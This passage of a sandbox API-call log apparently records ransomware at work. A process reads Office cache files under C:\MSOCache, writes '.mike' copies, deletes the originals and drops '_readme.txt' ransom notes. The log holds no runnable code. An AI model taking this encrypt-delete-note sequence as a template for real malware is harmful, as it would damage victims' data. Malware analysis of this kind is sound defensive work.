Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0041.965] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0041.965] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x21c4a14 | out: lpFileInformation=0x21c4a14*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe3367160, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe3367160, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe3367160, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x5290)) returned 1 [0041.965] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0041.966] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.966] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml", dwFileAttributes=0x80) returned 1 [0041.966] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed28, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.966] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0041.967] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.967] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0041.967] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.967] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0041.967] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.967] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\_readme.txt", lpFilePart=0x0) returned 0x4a [0041.967] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0b0) returned 1 [0041.967] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\_readme.txt" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x264 [0041.968] GetFileType (hFile=0x264) returned 0x1 [0041.968] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ac) returned 1 [0041.968] GetFileType (hFile=0x264) returned 0x1 [0041.968] WriteFile (in: hFile=0x264, lpBuffer=0x21c66f8*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af148, lpOverlapped=0x0 | out: lpBuffer=0x21c66f8*, lpNumberOfBytesWritten=0x2af148*=0x45e, lpOverlapped=0x0) returned 1 [0041.969] CloseHandle (hObject=0x264) returned 1 [0041.969] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab", lpFilePart=0x0) returned 0x4b [0041.969] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi", lpFilePart=0x0) returned 0x4b [0041.969] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml", lpFilePart=0x0) returned 0x4b [0041.969] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af164) returned 1 [0041.970] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.970] GetFileType (hFile=0x264) returned 0x1 [0041.970] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af160) returned 1 [0041.970] GetFileType (hFile=0x264) returned 0x1 [0041.970] CloseHandle (hObject=0x264) returned 1 [0041.971] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1f8) returned 1 [0041.971] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0041.971] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0041.971] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0041.971] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml"), fInfoLevelId=0x0, lpFileInformation=0x21cca34 | out: lpFileInformation=0x21cca34*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80b17dc0, ftCreationTime.dwHighDateTime=0x1cb1486, ftLastAccessTime.dwLowDateTime=0x80b17dc0, ftLastAccessTime.dwHighDateTime=0x1cb1486, ftLastWriteTime.dwLowDateTime=0x468a2b70, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x2213)) returned 1 [0041.971] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0041.971] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0041.971] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml"), fInfoLevelId=0x0, lpFileInformation=0x21ccd60 | out: lpFileInformation=0x21ccd60*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80b17dc0, ftCreationTime.dwHighDateTime=0x1cb1486, ftLastAccessTime.dwLowDateTime=0x80b17dc0, ftLastAccessTime.dwHighDateTime=0x1cb1486, ftLastWriteTime.dwLowDateTime=0x468a2b70, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x2213)) returned 1 [0041.971] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0041.971] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0041.971] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml.mike" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.971] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0041.972] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0041.972] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml.mike" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af164 | out: lpFileInformation=0x2af164*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.972] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0041.972] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0041.972] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml.mike" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.972] GetFileType (hFile=0x264) returned 0x1 [0041.972] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0041.972] GetFileType (hFile=0x264) returned 0x1 [0041.972] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x0 [0041.972] WriteFile (in: hFile=0x264, lpBuffer=0x21cdc50*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x21cdc50*, lpNumberOfBytesWritten=0x2af104*=0x220, lpOverlapped=0x0) returned 1 [0041.973] CloseHandle (hObject=0x264) returned 1 [0041.973] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af130) returned 1 [0041.973] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml"), fInfoLevelId=0x0, lpFileInformation=0x21cd738 | out: lpFileInformation=0x21cd738*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80b17dc0, ftCreationTime.dwHighDateTime=0x1cb1486, ftLastAccessTime.dwLowDateTime=0x80b17dc0, ftLastAccessTime.dwHighDateTime=0x1cb1486, ftLastWriteTime.dwLowDateTime=0x468a2b70, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x2213)) returned 1 [0041.973] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af12c) returned 1 [0041.973] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0041.974] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.974] GetFileType (hFile=0x264) returned 0x1 [0041.974] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0041.974] GetFileType (hFile=0x264) returned 0x1 [0041.974] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x0 [0041.974] ReadFile (in: hFile=0x264, lpBuffer=0x21ced84, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x21ced84*, lpNumberOfBytesRead=0x2af110*=0x2213, lpOverlapped=0x0) returned 1 [0042.015] CloseHandle (hObject=0x264) returned 1 [0042.016] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0042.016] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml.mike" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.016] GetFileType (hFile=0x264) returned 0x1 [0042.016] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0042.016] GetFileType (hFile=0x264) returned 0x1 [0042.016] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x220 [0042.016] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0042.016] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml.mike" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.017] GetFileType (hFile=0x264) returned 0x1 [0042.017] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af088) returned 1 [0042.017] GetFileType (hFile=0x264) returned 0x1 [0042.018] WriteFile (in: hFile=0x264, lpBuffer=0x21e0b08*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af134, lpOverlapped=0x0 | out: lpBuffer=0x21e0b08*, lpNumberOfBytesWritten=0x2af134*=0x20c, lpOverlapped=0x0) returned 1 [0042.018] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0042.018] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0042.018] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0042.018] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0042.018] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml", dwFileAttributes=0x80) returned 1 [0042.018] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml")) returned 1 [0042.019] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml", lpFilePart=0x0) returned 0x4b [0042.019] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0042.019] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0042.019] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0042.019] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml", lpFilePart=0x0) returned 0x4b [0042.019] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\_readme.txt", lpFilePart=0x0) returned 0x4a [0042.019] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0b0) returned 1 [0042.020] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\_readme.txt" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x264 [0042.020] GetFileType (hFile=0x264) returned 0x1 [0042.020] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ac) returned 1 [0042.020] GetFileType (hFile=0x264) returned 0x1 [0042.020] WriteFile (in: hFile=0x264, lpBuffer=0x21e3fb0*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af148, lpOverlapped=0x0 | out: lpBuffer=0x21e3fb0*, lpNumberOfBytesWritten=0x2af148*=0x45e, lpOverlapped=0x0) returned 1 [0042.021] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af234) returned 1 [0042.021] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0042.021] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x2aed10, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0042.022] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2aef5c | out: lpFindFileData=0x2aef5c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x46538340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xe338d2c0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe33ff6e0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0042.022] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x46538340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xe338d2c0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe33ff6e0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.022] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe5ed9630, ftCreationTime.dwHighDateTime=0x1cb12b3, ftLastAccessTime.dwLowDateTime=0xe5ed9630, ftLastAccessTime.dwHighDateTime=0x1cb12b3, ftLastWriteTime.dwLowDateTime=0x4655d500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x1e6600, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office32WW.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1 [0042.022] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe3341000, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe3341000, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe3341000, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x12e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office32WW.xml.mike", cAlternateFileName="OFFICE~1.MIK")) returned 1 [0042.022] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xec54b6b0, ftCreationTime.dwHighDateTime=0x1cb04a9, ftLastAccessTime.dwLowDateTime=0xec54b6b0, ftLastAccessTime.dwHighDateTime=0x1cb04a9, ftLastWriteTime.dwLowDateTime=0x4a687710, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x2a968, dwReserved0=0x0, dwReserved1=0x0, cFileName="ose.exe", cAlternateFileName="")) returned 1 [0042.022] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xde72fbf0, ftCreationTime.dwHighDateTime=0x1cb0d0b, ftLastAccessTime.dwLowDateTime=0xde72fbf0, ftLastAccessTime.dwHighDateTime=0x1cb0d0b, ftLastWriteTime.dwLowDateTime=0x49c902c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x709768, dwReserved0=0x0, dwReserved1=0x0, cFileName="osetup.dll", cAlternateFileName="")) returned 1 [0042.022] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc9c380f0, ftCreationTime.dwHighDateTime=0x1cb12b3, ftLastAccessTime.dwLowDateTime=0xc9c380f0, ftLastAccessTime.dwHighDateTime=0x1cb12b3, ftLastWriteTime.dwLowDateTime=0x465d00f0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x228df5c, dwReserved0=0x0, dwReserved1=0x0, cFileName="OWOW32WW.cab", cAlternateFileName="")) returned 1 [0042.023] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe7c66670, ftCreationTime.dwHighDateTime=0x1cb0ee5, ftLastAccessTime.dwLowDateTime=0xe7c66670, ftLastAccessTime.dwHighDateTime=0x1cb0ee5, ftLastWriteTime.dwLowDateTime=0x4a6ac100, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x165510, dwReserved0=0x0, dwReserved1=0x0, cFileName="PidGenX.dll", cAlternateFileName="")) returned 1 [0042.023] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x95261510, ftCreationTime.dwHighDateTime=0x1cb048a, ftLastAccessTime.dwLowDateTime=0x95261510, ftLastAccessTime.dwHighDateTime=0x1cb048a, ftLastWriteTime.dwLowDateTime=0x4a6ac100, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0xaec3a, dwReserved0=0x0, dwReserved1=0x0, cFileName="pkeyconfig-office.xrm-ms", cAlternateFileName="PKEYCO~1.XRM")) returned 1 [0042.023] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeb7e7af0, ftCreationTime.dwHighDateTime=0x1cb04a9, ftLastAccessTime.dwLowDateTime=0xeb7e7af0, ftLastAccessTime.dwHighDateTime=0x1cb04a9, ftLastWriteTime.dwLowDateTime=0x49c691c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x150578, dwReserved0=0x0, dwReserved1=0x0, cFileName="setup.exe", cAlternateFileName="")) returned 1 [0042.023] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe3367160, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe3367160, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe3367160, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x5290, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml.mike", cAlternateFileName="SETUPX~1.MIK")) returned 1 [0042.023] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x749b0240, ftCreationTime.dwHighDateTime=0x1cb1486, ftLastAccessTime.dwLowDateTime=0x749b0240, ftLastAccessTime.dwHighDateTime=0x1cb1486, ftLastWriteTime.dwLowDateTime=0x46a46a30, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0xb9fa2f7, dwReserved0=0x0, dwReserved1=0x0, cFileName="VisiorWW.cab", cAlternateFileName="")) returned 1 [0042.023] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, 